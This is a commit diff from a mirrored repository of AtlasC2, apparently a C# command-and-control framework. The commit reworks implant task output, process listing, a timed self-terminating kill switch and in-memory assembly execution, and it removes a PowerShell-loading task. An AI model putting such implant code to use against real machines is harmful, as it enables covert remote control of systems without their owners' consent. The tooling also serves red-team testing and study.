qwqdanchun
/
AtlasC2
mirror of https://github.com/qwqdanchun/AtlasC2.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Public Release...finally. Probs riddled w/ bugs I missed but meh. Welp, here goes nothing

This commit is contained in:
Gr1mmie 2022-03-19 21:09:14 -04:00
parent 22729f8b8d
commit f7a342e2f5
22 changed files with 111 additions and 75 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
APIModels/Requests/ImplantTaskRequest.cs
View File

@ -18,7 +18,6 @@ namespace APIModels.Requests
public class ImplantTaskRequest
{
public string Command { get; set; }
// json str, see alpha
public string Args { get; set; }
public string File { get; set; }
}

1
Client/APIComms/comms.cs
View File

@ -18,7 +18,6 @@ namespace Client.Comms
using (StreamReader reader = new StreamReader(stream)) { return reader.ReadToEnd(); }
}
}
}
public static string SendPOST(string addr, string content){

5
Client/JSON/Classes.cs
View File

@ -22,7 +22,6 @@ namespace Client.JSON
[Serializable]
public class ArgsData
{
//public string Taskname { get; set; }
public List<TaskArgs> Params { get; set; }
}
@ -32,7 +31,6 @@ namespace Client.JSON
public string Command { get; set; }
public string Args { get; set; }
public string File { get; set; }
//public byte[] File { get; set; }
}
[Serializable]
@ -42,7 +40,6 @@ namespace Client.JSON
public string Command { get; set; }
public string Args { get; set; }
public string File { get; set; }
//public byte[] File { get; set; }
}
@ -50,6 +47,8 @@ namespace Client.JSON
public class TaskRecvOut
{
public string Id { get; set; }
public string TaskName { get; set; }
public string TaskArgs { get; set; }
public string TaskOut { get;set; }
}

2
Client/Models/Data/TaskOptions.cs
View File

@ -2,8 +2,6 @@
{
class TaskOptions
{
// https://www.youtube.com/watch?v=C6lhpNkw6H4
public static object assemName = new AssemName();
public static object assemType = new AssemType();
public static object assemMethod = new AssemMethod();

22
Client/Utils/ClientUtils/Admin.cs Normal file
View File

@ -0,0 +1,22 @@
using System.Text;
using static Client.Models.Client;
namespace Client.Utils
{
class AdminTasks : Models.Util
{
public override string UtilName => "Admin";
public override string Desc => "List Admin tasks";
public override string UtilExecute(string[] opts)
{
StringBuilder _out = new StringBuilder();
if (_adminTask.Count == 0) { Init.OptInit(); }
foreach (Models.AdminTask admTask in _adminTask) { _out.AppendLine($"{admTask.TaskName,-25} {admTask.Desc}"); }
return _out.ToString();
}
}
}

22
Client/Utils/ClientUtils/ClientUtils.cs Normal file
View File

@ -0,0 +1,22 @@
using System.Text;
using static Client.Models.Client;
namespace Client.Utils
{
class ClientUtil : Models.Util
{
public override string UtilName => "Utils";
public override string Desc => "List available utils";
public override string UtilExecute(string[] opts)
{
StringBuilder _out = new StringBuilder();
if (_utils.Count == 0) { Init.OptInit(); }
foreach (Models.Util util in _utils) { _out.AppendLine($"{util.UtilName,-25} {util.Desc}"); }
return _out.ToString();
}
}
}

5
Client/Utils/ImplantUtils/RemoveImplant.cs
View File

@ -1,5 +1,4 @@
using System;
using System.Text;
using System.Text;
using System.Linq;
using Client.Models;
@ -24,8 +23,6 @@ namespace Client.Utils
var implantName = opts[1];
var _implant = ImplantList.FirstOrDefault(implant => implant.Equals(implantName));
if (_implant is null) { throw new AtlasException($"[-] Implant {implantName} does not exist"); }
//TaskOps.sendAdminUtil("KillSwitch");
Comms.comms.SendDELETE($"{TeamServerAddr}/Implants/{implantName}");

2
Client/Utils/ImplantUtils/SendTask.cs
View File

@ -38,7 +38,7 @@ namespace Client.Utils
}
catch (AtlasException e) { return e.Message; }
//catch (System.Net.WebException) { return $"[-] Connection to teamserver could not be established, verify teamserver is active\n"; }
catch (System.Net.WebException) { return $"[-] Connection to teamserver could not be established, verify teamserver is active\n"; }
}
}
}

24
Client/Utils/ImplantUtils/TaskOut.cs
View File

@ -1,11 +1,8 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Text;
using Client.Models;
using static Client.JSON.Classes;
using static Client.Models.Client;
namespace Client.Utils.ImplantUtils
@ -21,17 +18,24 @@ namespace Client.Utils.ImplantUtils
{
try
{
if (opts is null) { throw new AtlasException($"[-] No parameters passed\nUsage: TaskOut [taskId]\n"); }
if (opts.Length > 2) { throw new AtlasException($"[*] Incorrect parameters passed\nUsage: TaskOut [taskId]\n"); }
if (opts is null) { throw new AtlasException($"[*] Usage: TaskOut [taskId]\n"); }
if (opts.Length > 2) { throw new AtlasException($"[*] Usage: TaskOut [taskId]\n"); }
taskId = opts[1];
StringBuilder _out = new StringBuilder();
var taskOut = Comms.comms.SendGET($"{TeamServerAddr}/Implants/{CurrentImplant}/{taskId}");
var parsedTaskOut = JSONOps.ReturnTaskData(taskOut);
string taskOut = Comms.comms.SendGET($"{TeamServerAddr}/Implants/{CurrentImplant}/tasks/{taskId}")
.Replace("\\\\\"", "\"");
TaskRecvOut parsedTaskOut = JSONOps.ReturnTaskData(taskOut);
ArgsRecv parsedArgs = JSONOps.ReturnTaskArgs(parsedTaskOut.TaskArgs);
_out.AppendLine(parsedTaskOut.TaskOut);
_out.AppendLine($"TaskName: {parsedTaskOut.TaskName}");
if (parsedArgs != null) {
_out.AppendLine($"\nParams:");
foreach (TaskArgs param in parsedArgs.Params) { _out.AppendLine($"\t{param.OptionName} - {param.OptionValue}"); }
}
_out.AppendLine($"Output:\n{parsedTaskOut.TaskOut}");
return _out.ToString();
}

12
Client/Utils/ImplantUtils/TasksOut.cs
View File

@ -1,7 +1,4 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Text;
using Newtonsoft.Json;
@ -28,14 +25,13 @@ namespace Client.Utils.ImplantUtils
var tasks = Comms.comms.SendGET($"{TeamServerAddr}/Implants/{CurrentImplant}/tasks").TrimStart('[').TrimEnd(']');
if (tasks.Length == 0) { throw new AtlasException("[*] No tasks to view\n"); }
if (tasks.Contains("},{")) { tasks = tasks.Replace("},{", "}&{"); }
if (tasks.Contains("},{\"id")) { tasks = tasks.Replace("},{\"id", "}&{\"id"); }
var taskList = tasks.Split('&');
foreach (var _task in taskList)
{
foreach (var _task in taskList) {
taskData = JsonConvert.DeserializeObject<JSON.Classes.TaskRecvOut>(_task);
_out.AppendLine($"{taskData.Id} {TaskName}");
_out.AppendLine($"{taskData.Id} {taskData.TaskName}");
}
return _out.ToString();

1
Client/Utils/ListenerUtils/StartListener.cs
View File

@ -25,6 +25,7 @@ namespace Client.Utils
StringBuilder _out = new StringBuilder();
if (opts is null) { throw new AtlasException($"[*] Usage: StartListener [ListenerName] [ListenerPort]\n"); }
if(opts.Length > 3 || opts.Length < 3) { throw new AtlasException($"[*] Usage: StartListener [ListenerName] [ListenerPort]\n"); }
ListenerName = opts[1];
ListenerPort = Int32.Parse(opts[2]);

3
Client/Utils/TaskUtils/AdminUtils/KillSwitch.cs
View File

@ -12,7 +12,8 @@ namespace Client.Utils
public override string AdminUtilExec(string[] opts)
{
try {
var resp = TaskOps.sendAdminUtil("KillSwitch");
TaskOps.sendAdminUtil("KillSwitch");
Models.Client.CurrentImplant = null;
return "";
} catch (System.Net.WebException) { throw new Exception($"Implant successfully shutdown"); }
}

8
Client/Utils/TaskUtils/AdminUtils/Ps.cs
View File

@ -14,11 +14,15 @@ namespace Client.Utils
{
try
{
string Proc;
if (opts != null && opts.Length > 1) { throw new AtlasException($"[*] Usage: Ps\n"); }
if (opts != null && opts.Length > 2) { throw new AtlasException($"[*] Usage: Ps <procName>\n"); }
if (CurrentImplant is null) { throw new AtlasException("[-] No connected implant"); }
Proc = opts[1];
return TaskOps.sendAdminUtil(TaskName);
if (Proc != null) { return TaskOps.sendAdminUtil(TaskName, Proc); }
else { return TaskOps.sendAdminUtil(TaskName); }
}
catch (AtlasException e) { return e.Message; }

15
Client/Utils/TaskUtils/PSLoad.cs
View File

@ -1,15 +0,0 @@
using System.Collections.Generic;
using static Client.Models.TaskOptions;
namespace Client.Utils
{
class PSLoad : Models.Task
{
public override string TaskName => "PSLoad";
public override string Desc => "Load a PowerShell file into the implant process";
public override List<object> OptList { get; } = new List<object> { psFile };
}
}

10
Client/Utils/Utils.cs
View File

@ -216,13 +216,11 @@ namespace Client.Utils
}
public static Classes.TaskSendOut ReturnTaskID(string taskresp) {
return JsonConvert.DeserializeObject<Classes.TaskSendOut>(taskresp);
}
public static Classes.TaskSendOut ReturnTaskID(string taskresp) { return JsonConvert.DeserializeObject<Classes.TaskSendOut>(taskresp); }
public static Classes.TaskRecvOut ReturnTaskData(string taskOut) {
return JsonConvert.DeserializeObject<Classes.TaskRecvOut>(taskOut);
}
public static Classes.TaskRecvOut ReturnTaskData(string taskOut) { return JsonConvert.DeserializeObject<Classes.TaskRecvOut>(taskOut); }
public static Classes.ArgsRecv ReturnTaskArgs(string taskArgs) { return JsonConvert.DeserializeObject<Classes.ArgsRecv>(taskArgs); }
public static string PackStartListenerData(string name, int port)
{

2
Implant/Models/Implant/ImplantTaskOut.cs
View File

@ -3,6 +3,8 @@
public class ImplantTaskOut
{
public string Id { get; set; }
public string TaskName { get; set; }
public string TaskArgs { get; set; }
public string TaskOut { get; set; }
}
}

8
Implant/Program.cs
View File

@ -34,8 +34,8 @@ namespace Implant
proc.Dispose();
}
public static void SendTaskOut(string _id, string _out) {
var taskOut = new ImplantTaskOut { Id = _id, TaskOut = _out };
public static void SendTaskOut(ImplantTask task, string _id, string _out) {
var taskOut = new ImplantTaskOut { Id = _id, TaskName = task.Command, TaskArgs = task.Args,TaskOut = _out };
_comms.DataSend(taskOut);
}
@ -45,9 +45,9 @@ namespace Implant
try
{
var _out = command.Execute(task);
SendTaskOut(task.Id, _out);
SendTaskOut(task, task.Id, _out);
} catch (Exception e) {
SendTaskOut(task.Id, e.Message);
SendTaskOut(task, task.Id, e.Message);
}
}

12
Implant/Tasks/Execute/Administration/KillSwitch.cs
View File

@ -1,4 +1,5 @@
using System;
using System.Timers;
using Implant.Models;
@ -11,8 +12,15 @@ namespace Implant.Tasks.Execute
public override string Execute(ImplantTask task)
{
Environment.Exit(0);
return $"Implant Shutdown";
Timer timer = new Timer();
timer.Interval = 5000;
timer.AutoReset = false;
timer.Elapsed += SelfDestruct;
timer.Start();
return "";
}
private static void SelfDestruct(object sender, ElapsedEventArgs e) { Environment.Exit(0); }
}
}

11
Implant/Tasks/Execute/Administration/Ps.cs
View File

@ -22,8 +22,6 @@ namespace Implant.Tasks.Execute
var procs = Process.GetProcesses();
// if(task.Args != null) { procs = Process.GetProcesses(task.Args); }
procIDLen = psParse.getMaxProcIDLen(procs);
procNameLen = psParse.getMaxProcNameLen(procs) + procIDLen;
procSessionIDLen = psParse.getMaxProcSessionIDLen(procs) + procNameLen;
@ -33,7 +31,14 @@ namespace Implant.Tasks.Execute
_out.AppendLine($"{"---".Align(procIDLen)} {"--------".Align(procNameLen)} {"---------".Align(procSessionIDLen)}");
foreach (var proc in procs){
_out.AppendLine($"{proc.Id.Align(procIDLen)} {proc.ProcessName.Align(procNameLen)} {proc.SessionId.Align(procSessionIDLen)}");
if(task.Args != null && proc.ProcessName == task.Args) {
_out.AppendLine($"{proc.Id.Align(procIDLen)} {proc.ProcessName.Align(procNameLen)} " +
$"{proc.SessionId.Align(procSessionIDLen)}");
}
if (task.Args == null) {
_out.AppendLine($"{proc.Id.Align(procIDLen)} {proc.ProcessName.Align(procNameLen)} " +
$"{proc.SessionId.Align(procSessionIDLen)}");
}
}
_out.AppendLine();

16
Implant/Tasks/Execute/Functions/LoadFunctions.cs
View File

@ -1,12 +1,8 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.IO;
using System.Net;
using System.Reflection;
using System.Text;
using System.Threading;
using static System.Console;
namespace Implant.Tasks.Execute
{
@ -17,20 +13,16 @@ namespace Implant.Tasks.Execute
// would be cool if these could be called from a yaml or something
// load assems into running process for expansion of implant capability (done)
// create task to list loaded assems(see utils) and their methods for operator viewing (done) and allow operator to pass assem + method into
// task to execute given method from assem
private static Assembly GetAssemblyByName(string assemName){
return AppDomain.CurrentDomain.GetAssemblies().FirstOrDefault(assem => assem.GetName().Name == assemName);
}
public static string ExecuteAssemEP(string assemName, string parameters){
var snapshotOut = Console.Out;
var snapshotErr = Console.Error;
TextWriter snapshotOut = Console.Out;
TextWriter snapshotErr = Console.Error;
var memStream = new MemoryStream();
var streamWriter = new StreamWriter(memStream) { AutoFlush = true };
MemoryStream memStream = new MemoryStream();
StreamWriter streamWriter = new StreamWriter(memStream) { AutoFlush = true };
Console.SetOut(streamWriter);
Console.SetError(streamWriter);

2
TeamServer/Models/Implants/ImplantTaskOut.cs
View File

@ -3,6 +3,8 @@
public class ImplantTaskOut
{
public string Id { get; set; }
public string TaskName { get; set; }
public string TaskArgs { get; set; }
public string TaskOut { get; set; }
}
}

2
TeamServer/TeamServer.csproj
View File

@ -13,4 +13,6 @@
<ProjectReference Include="..\APIModels\APIModels.csproj" />
</ItemGroup>
<ProjectExtensions><VisualStudio><UserProperties properties_4launchsettings_1json__JsonSchema="" /></VisualStudio></ProjectExtensions>
</Project>